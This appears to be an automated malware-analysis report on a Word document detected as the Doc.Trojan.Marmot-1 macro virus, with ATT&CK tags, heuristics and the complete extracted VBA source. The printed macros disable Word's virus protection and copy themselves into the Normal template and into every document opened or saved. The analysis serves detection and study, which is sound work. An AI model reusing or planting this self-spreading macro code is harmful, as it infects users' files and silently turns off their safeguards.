MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as Doc.Trojan.Marmot-1 by ClamAV. It contains VBA macros, including AutoOpen and Auto_Close, which are designed to copy the macro project to the Normal template and the active document. This behavior suggests an attempt to establish persistence or spread the infection. The macro also includes a hardcoded birthday message from 'Sergie Sad'.
Heuristics 5
- ClamAV: Doc.Trojan.Marmot-1 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Marmot-1
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Auto_Close macro (high) OLE_VBA_AUTOCLOSE: Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2395 bytes |

SHA-256: 64a281ea00681ab08bc101dcf3a7efe147831af2e0de563c241209019df46114
Detection: ClamAV: Doc.Trojan.Marmot-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Sergie_Sad"
' ------------------ "GROUNDHOG DAY" v1.0 -----------------
' -------------- 02.02.2000 (C) Sergie Sad --------------
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Макрос создан 02.02.2000 Sergie Sad"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.AutoOpen"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
On Error GoTo fail
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
fail:
End Sub
Sub FileOpen()
Attribute FileOpen.VB_Description = "Макрос создан 02.02.2000 Sergie Sad"
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.FileOpen"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Dialogs(wdDialogFileOpen).Show
On Error GoTo fail
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
fail:
If (Month(Now()) = 10) And (Day(Now()) = 13) Then ask = MsgBox("Не забудь поздравить меня с днем рождения. Sergie Sad (3512) 12-6818", 4096 + 64, "Сегодня 13 октября")
End Sub
Sub FileSave()
Attribute FileSave.VB_Description = "Макрос создан 02.02.2000 Sergie Sad"
Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.AutoClose"
Options.SaveNormalPrompt = False
Options.VirusProtection = False
On Error GoTo fail
ActiveDocument.Save
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, Name:="Sergie_Sad", _
Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
fail:
End Sub
Sub AutoClose()
Attribute AutoClose.VB_Description = "Макрос создан 02.02.2000 Sergie Sad"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.Sergie_Sad.FileClose"
If ActiveDocument.BuiltInDocumentProperties(wdPropertyLastAuthor) <> "" Then Call FileSave
End Sub